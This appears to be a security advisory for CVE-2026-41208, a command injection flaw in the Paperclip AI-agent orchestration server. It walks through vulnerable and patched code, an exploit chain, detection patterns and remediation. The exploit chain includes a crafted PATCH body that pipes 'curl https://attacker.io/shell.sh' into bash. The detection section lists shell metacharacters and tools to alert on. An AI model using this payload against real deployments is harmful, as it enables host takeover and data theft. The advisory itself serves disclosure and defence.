CVE-2026-41208: Paperclip Agent API Key Escalates to Host RCE
An agent credential in Paperclip ≤2026.415.x allows arbitrary OS command injection via adapterConfig.workspaceStrategy.provisionCommand, executed unsanitized by the server runtime.
Paperclip is a system that lets multiple AI agents work together on tasks. Think of it like a team of virtual assistants controlled by a central manager. The problem is that someone has found a way to break out of the sandbox — basically escaping from the controlled room where these AI agents are supposed to stay.
Here's what's happening: each AI agent gets an access key, like a keycard that lets it do its job. Normally, agents can only perform specific approved tasks within their sandbox. But researchers discovered that if you tweak how an agent connects to other systems, you can sneak in commands that tell the main computer to do things directly.
This is like someone giving a delivery driver a uniform and credentials, but then using that to walk into the company's server room instead of just making deliveries. An attacker with a valid agent key could potentially take full control of the entire Paperclip system and the computers it runs on.
Who should worry? Companies using Paperclip to run AI workflows, especially those that handle sensitive data, such as healthcare providers, financial firms, or SaaS platforms that depend on this software. If your business uses Paperclip, an attacker could steal data, disrupt operations, or install malware.
The good news: there's no evidence anyone is actively exploiting this yet, so you have time to act.
What you should do: First, update Paperclip to version 2026.416.0 or later immediately if you're using it. Second, review who has API keys and disable any that aren't actively needed. Third, monitor your Paperclip logs for suspicious agent behavior or unusual system commands. If you're unsure whether your organization uses this software, ask your IT team today.
CVE-2026-41208 is a privilege escalation and remote code execution vulnerability in @paperclipai/server, the Node.js backend that orchestrates AI agent teams for automated business workflows. An attacker in possession of any valid Agent API key — a credential scoped to the agent runtime, not the administrative plane — can escalate to arbitrary OS command execution on the host running the Paperclip server process.
CVSS 8.8 (HIGH) reflects the low attack complexity once a credential is obtained: no memory corruption, no heap spray, no race condition. This is a straightforward injection primitive hidden behind a trust boundary that the server silently collapses.
Root cause: The /agents/:id API endpoint permits an authenticated agent to overwrite its own adapterConfig, including adapterConfig.workspaceStrategy.provisionCommand, which the server later passes unsanitized to a shell execution context during workspace provisioning.
Affected Component
Package: @paperclipai/server
Affected versions: all releases prior to 2026.416.0
The vulnerability lives in two cooperating defects: an overly permissive PATCH handler that allows agents to mutate their own configuration, and an unsanitized shell invocation that consumes that configuration later.
The agent update route performs authorization but does not restrict which fields an agent may write to its own document. An agent credential is expected only to report status or pull tasks — it should never be able to rewrite its own adapter configuration:
// packages/server/src/routes/agents.ts (pre-patch pseudocode)
router.patch('/agents/:id', agentOrAdminAuth, async (req, res) => {
  const { id } = req.params;
  const agent = await db.agents.findById(id);
  // BUG: agentOrAdminAuth verifies the caller owns this agent ID,
  // but does NOT restrict which top-level keys may be written.
  // An agent token can supply any field, including adapterConfig.
  const updated = await db.agents.updateById(id, req.body);
  res.json(updated);
});
The workspace provisioner is invoked when the server assigns work to an agent. It reads provisionCommand from the stored configuration and hands it directly to child_process.exec — a function that spawns a shell and is therefore injectable by design when given attacker-controlled input:
// packages/server/src/workspace/provisioner.ts (pre-patch pseudocode)
async function provisionWorkspace(agent: Agent): Promise<void> {
  const strategy = agent.adapterConfig?.workspaceStrategy;
  if (strategy?.provisionCommand) {
    // BUG: provisionCommand is attacker-controlled via PATCH /agents/:id.
    // exec() spawns /bin/sh -c with server privileges.
    await exec(strategy.provisionCommand); // <-- unsanitized shell exec
  }
}
No trust check exists anywhere on the call chain from HTTP request to shell: there is no sanitization pass, no allowlist of permitted command templates, and no stripping of shell metacharacters. exec receives exactly what the attacker stored in the database.
Exploitation Mechanics
EXPLOIT CHAIN:
1. Attacker acquires any valid Agent API key (leaked credential, compromised
   agent container, insider, or brute-force of a weak key space).
2. Attacker sends PATCH /agents/:id with a crafted body:
   {
     "adapterConfig": {
       "workspaceStrategy": {
         "provisionCommand": "curl https://attacker.io/shell.sh | bash"
       }
     }
   }
   Server accepts the write: the agent token passes agentOrAdminAuth for its
   own ID, and no field allowlist rejects adapterConfig.
3. Server persists the poisoned adapterConfig to the agents collection in
   the backing database (MongoDB / SQLite depending on deployment).
4. At the next task dispatch cycle, the server calls provisionWorkspace(agent).
   provisionWorkspace reads adapterConfig.workspaceStrategy.provisionCommand
   from the stored document.
5. child_process.exec() spawns:
   /bin/sh -c "curl https://attacker.io/shell.sh | bash"
   under the OS user running the Paperclip server process (commonly root
   or a service account with broad filesystem access).
6. Attacker achieves arbitrary OS command execution on the server host.
   Lateral movement, credential harvest, and persistence follow from here.
The trigger is reliable and deterministic. There is no timing dependency; the attacker can force immediate provisioning by submitting a task assignment, or simply wait for the scheduler's next cycle. The only prerequisite is the agent credential itself.
This is not a memory-corruption vulnerability; the primitive is injection at the application layer. The relevant "layout" is the data path: the PATCH request body is merged into the stored agent document, and the provisioner later passes the stored provisionCommand string to exec.
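The data path can be modeled in a few lines. The following is a minimal in-memory sketch, not Paperclip source: the `store` map, `patchAgent`, and `fakeExec` are hypothetical stand-ins for the database, the PATCH handler, and `child_process.exec`, and the shell sink only records the string it receives instead of running it.

```typescript
// Hypothetical in-memory model of the pre-patch data path (not Paperclip source).
interface AgentDoc {
  id: string;
  status: string;
  adapterConfig?: { workspaceStrategy?: { provisionCommand?: string } };
}

// Stand-in for the agents collection.
const store = new Map<string, AgentDoc>([
  ["agt_demo", { id: "agt_demo", status: "idle" }],
]);

// Stand-in for child_process.exec: records the command instead of running it.
const shellInvocations: string[] = [];
function fakeExec(command: string): void {
  shellInvocations.push(command);
}

// Defect 1: the whole request body is merged into the stored document.
function patchAgent(id: string, body: Partial<AgentDoc>): AgentDoc {
  const current = store.get(id);
  if (!current) throw new Error(`unknown agent ${id}`);
  const updated = { ...current, ...body, id };
  store.set(id, updated);
  return updated;
}

// Defect 2: the stored string reaches the shell sink unchanged.
function provisionWorkspace(id: string): void {
  const command =
    store.get(id)?.adapterConfig?.workspaceStrategy?.provisionCommand;
  if (command) fakeExec(command);
}

// An agent-authenticated caller writes its own adapterConfig...
patchAgent("agt_demo", {
  adapterConfig: {
    workspaceStrategy: { provisionCommand: "echo attacker-controlled" },
  },
});
// ...and the next provisioning pass hands that string to the sink.
provisionWorkspace("agt_demo");
```

After both calls, `shellInvocations` holds the exact string supplied in the PATCH body, which is the property that makes the chain deterministic.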
The fix in 2026.416.0 applies two independent controls: field restriction on the PATCH route, and elimination of the raw exec sink in the provisioner.
// BEFORE (vulnerable): packages/server/src/routes/agents.ts
router.patch('/agents/:id', agentOrAdminAuth, async (req, res) => {
  const { id } = req.params;
  const updated = await db.agents.updateById(id, req.body); // full body merge
  res.json(updated);
});
// AFTER (patched): packages/server/src/routes/agents.ts
router.patch('/agents/:id', agentOrAdminAuth, async (req, res) => {
  const { id } = req.params;
  // adapterConfig is an admin-only field: agent-authed requests that
  // include it are rejected with 403 rather than silently stripped.
  const { adapterConfig, ...safeFields } = req.body;
  if (req.auth.role === 'agent' && adapterConfig !== undefined) {
    return res.status(403).json({ error: 'adapterConfig is read-only for agent tokens' });
  }
  // safeFields never contains adapterConfig, regardless of caller role.
  const updated = await db.agents.updateById(id, safeFields);
  res.json(updated);
});
// BEFORE (vulnerable): packages/server/src/workspace/provisioner.ts
async function provisionWorkspace(agent: Agent): Promise<void> {
  const strategy = agent.adapterConfig?.workspaceStrategy;
  if (strategy?.provisionCommand) {
    await exec(strategy.provisionCommand); // raw shell exec
  }
}
// AFTER (patched): packages/server/src/workspace/provisioner.ts
const ALLOWED_PROVISION_COMMANDS = new Set([
  'docker-compose up -d',
  'npm run workspace:init',
  // ... explicit allowlist of operator-defined templates
]);
async function provisionWorkspace(agent: Agent): Promise<void> {
  const strategy = agent.adapterConfig?.workspaceStrategy;
  if (strategy?.provisionCommand) {
    if (!ALLOWED_PROVISION_COMMANDS.has(strategy.provisionCommand)) {
      throw new Error(`Blocked disallowed provisionCommand: ${strategy.provisionCommand}`);
    }
    // execFile used instead of exec: no shell expansion, args are explicit.
    const [cmd, ...args] = strategy.provisionCommand.split(' ');
    await execFile(cmd, args);
  }
}
The defense-in-depth here is correct: even if a future refactor re-opens the write path, the sink is no longer a raw shell. execFile does not invoke a shell interpreter, removing the injection surface entirely for the provisioner path.
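The patched route shown above blocks one named field. A stricter variant of the same idea is a positive allowlist, where an agent token may write only fields that are explicitly listed. The sketch below is illustrative only: `filterPatchBody` is a hypothetical helper, and the field names in `AGENT_WRITABLE_FIELDS` are assumptions, since the advisory does not enumerate which fields agents legitimately update.

```typescript
// Hypothetical field names: the real set of agent-writable fields is an assumption.
const AGENT_WRITABLE_FIELDS = ["status", "lastHeartbeatAt"] as const;

type Role = "agent" | "admin";

// Returns the subset of the request body that the caller's role may write.
function filterPatchBody(
  role: Role,
  body: Record<string, unknown>,
): Record<string, unknown> {
  // Admin callers keep the full body (shallow copy).
  if (role === "admin") return { ...body };

  // Agent callers keep only explicitly allowlisted top-level keys.
  const filtered: Record<string, unknown> = {};
  for (const field of AGENT_WRITABLE_FIELDS) {
    if (Object.prototype.hasOwnProperty.call(body, field)) {
      filtered[field] = body[field];
    }
  }
  return filtered;
}

const attempted: Record<string, unknown> = {
  status: "busy",
  adapterConfig: {
    workspaceStrategy: { provisionCommand: "echo attacker-controlled" },
  },
};

const agentResult = filterPatchBody("agent", attempted); // adapterConfig dropped
const adminResult = filterPatchBody("admin", attempted); // adapterConfig kept
```

The design difference is that a new sensitive field added in a later release is closed to agents by default, instead of open until someone remembers to block it.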
Detection and Indicators
Because the attack writes to the database before the shell fires, defenders have two detection windows:
API audit log: PATCH /agents/:id requests from agent-scoped tokens that include an adapterConfig key in the request body. Legitimate agents should never issue this. Alert on any such write.
Database integrity: Monitor the agents collection for documents where adapterConfig.workspaceStrategy.provisionCommand contains shell metacharacters: |, ;, &, $(, backtick, >, <.
Process lineage: Paperclip server process spawning unexpected children (curl, wget, bash, sh, python) should trigger an EDR alert. Parent: node → child: /bin/sh -c ... is the canonical pattern.
Network egress: Outbound connections from the server host to unknown infrastructure shortly after a PATCH /agents/:id call may indicate successful exploitation.
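The database integrity check in the list above can be sketched as a small scan over exported agent documents. This is a rough illustration under stated assumptions: `AgentRecord` is a hypothetical shape mirroring the field path named in this advisory, and how the documents are loaded from the database is left out.

```typescript
// Metacharacters from the database integrity check: | ; & $( ` > <
const SHELL_METACHARACTERS = /[|;&`<>]|\$\(/;

function hasShellMetacharacters(command: string): boolean {
  return SHELL_METACHARACTERS.test(command);
}

// Hypothetical document shape: only the fields this check needs.
interface AgentRecord {
  id: string;
  adapterConfig?: { workspaceStrategy?: { provisionCommand?: string } };
}

// Returns the IDs of agents whose stored provisionCommand looks injectable.
function flagSuspiciousAgents(records: AgentRecord[]): string[] {
  return records
    .filter((record) => {
      const command =
        record.adapterConfig?.workspaceStrategy?.provisionCommand;
      return command !== undefined && hasShellMetacharacters(command);
    })
    .map((record) => record.id);
}

const sampleRecords: AgentRecord[] = [
  {
    id: "agt_a1b2c3d4",
    adapterConfig: {
      workspaceStrategy: {
        provisionCommand: "curl https://attacker.io/shell.sh | bash",
      },
    },
  },
  {
    id: "agt_clean",
    adapterConfig: {
      workspaceStrategy: { provisionCommand: "npm run workspace:init" },
    },
  },
  { id: "agt_no_config" },
];

const flagged = flagSuspiciousAgents(sampleRecords);
```

A metacharacter scan is a heuristic: it misses a malicious command that needs no shell syntax, so it complements rather than replaces the alert on agent-authored adapterConfig writes.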
Relevant log pattern (structured JSON logging):
{"level":"warn","msg":"agent PATCH included adapterConfig","agentId":"agt_a1b2c3d4",
"callerRole":"agent","remoteIp":"203.0.113.42","timestamp":"2026-04-16T14:22:11Z"}
Remediation
Upgrade immediately to @paperclipai/server ≥ 2026.416.0. The patch is the only complete fix.
Rotate all Agent API keys issued prior to the upgrade. A key that leaked before the upgrade stays valid until it is revoked, and any record it poisoned before the upgrade remains in the database afterwards.
Audit existing agent documents for unexpected provisionCommand values before bringing a patched server back online.
Principle of least privilege: Run the Paperclip server process as a non-root service account with no capability to write outside its working directory. This limits post-exploitation impact even when a command injection lands.
Network egress filtering: The server host should not have unrestricted outbound internet access. A deny-by-default egress policy would have broken the most common post-exploitation patterns (reverse shells, stager downloads).
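The audit step in the list above can be approximated by comparing every stored provisionCommand against the operator's allowlist, which also catches values that contain no shell metacharacters. The sketch below assumes the agent documents have already been exported into an array; `StoredAgent` and `auditProvisionCommands` are hypothetical names, and the allowlist entries are the two examples shown in the patched provisioner.

```typescript
// Hypothetical document shape: only the fields the audit needs.
interface StoredAgent {
  id: string;
  adapterConfig?: { workspaceStrategy?: { provisionCommand?: string } };
}

interface AuditFinding {
  id: string;
  command: string;
}

// Reports every agent whose stored provisionCommand is not on the allowlist.
function auditProvisionCommands(
  agents: StoredAgent[],
  allowed: ReadonlySet<string>,
): AuditFinding[] {
  const findings: AuditFinding[] = [];
  for (const agent of agents) {
    const command = agent.adapterConfig?.workspaceStrategy?.provisionCommand;
    if (command !== undefined && !allowed.has(command)) {
      findings.push({ id: agent.id, command });
    }
  }
  return findings;
}

// Example entries taken from the patched provisioner's allowlist.
const allowedCommands = new Set([
  "docker-compose up -d",
  "npm run workspace:init",
]);

const exportedAgents: StoredAgent[] = [
  {
    id: "agt_1",
    adapterConfig: {
      workspaceStrategy: { provisionCommand: "docker-compose up -d" },
    },
  },
  {
    id: "agt_2",
    adapterConfig: {
      workspaceStrategy: { provisionCommand: "touch /tmp/marker" },
    },
  },
  { id: "agt_3" },
];

const findings = auditProvisionCommands(exportedAgents, allowedCommands);
```

Any finding deserves manual review before the patched server is brought back online, since the patched provisioner will refuse to run a command that is not on its allowlist.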